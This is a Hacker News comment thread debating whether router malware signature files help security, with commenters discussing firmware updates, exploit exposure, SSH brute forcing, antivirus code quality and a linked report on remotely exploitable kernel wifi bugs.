Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

That’s an attack on the router itself, not the network traffic it carries.

Signature files are only useful to scan network traffic.



This was literally a discussion about the firmware of a router.

How is it not relevant? This person has not updated their router's firmware in over 3 years.

The viral traffic needs to get to the router in the first place. I assume that the means of reaching the router is literally via network traffic?

What am I missing?


When I hear “signature file” I think of a list of signatures of known viruses and malware.

These types of signature files aren’t meant to guard against exploits, SSH brute forcing, etc, even if the router applies them to inbound traffic in addition to forwarded traffic. To do that, you typically need a WAF or some clever fail2ban-like filtering rules. Even up-to-date signatures won’t prevent a router from getting 0wn3d if the ssh daemon has a security hole for example.

As sites move to HTTPS, routers can’t even really filter networking traffic anymore. I don’t see why a router needs signature lists at all


Thankyou for the insight.


> Hopefully that clears up the first question of "why does it need malware signature files?"

The malware signature files really don't help prevent your router joining a botnet.

Firmware updates, maybe, maybe not. It is quite possible for other routers with less generally sloppy and advertised-feature-rich firmware to actually be more secure even without updates for 3 years. It's quite possible that they have no api endpoints available for super-easy mobile app integration remote management etc, just ssh from local subnet or physical serial console.

There have been multiple cases of market-leading antivirus engines (symanted, mcaffee, etc) having sloppy code running with the highest possible privilege, parsing any files appearing on the system anywhere, and e.g. crashing a mail server that would otherwise be unaffected by the PoC samples being emailed through it by researchers.

So, I also take some issue with people who have no understanding of how all this software around us is designed and built (in routers, in windows, on web servers) and thinking that just updating everything all the time and running antivirus is the best you can do. You really can do a lot better if you know what you're doing.


Re: firmware updates, there is stuff like these remotely exploitable kernel wifi stack issues not that long ago:

https://lwn.net/ml/oss-security/20221013101046.GB20615@suse....

There can be driver specific remotely exploitable issues that might not be widely communicated. Until operating systems are written more robustly, just having admin level stuff set up robustly isn't always enough. Of course, updates can add bugs too.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: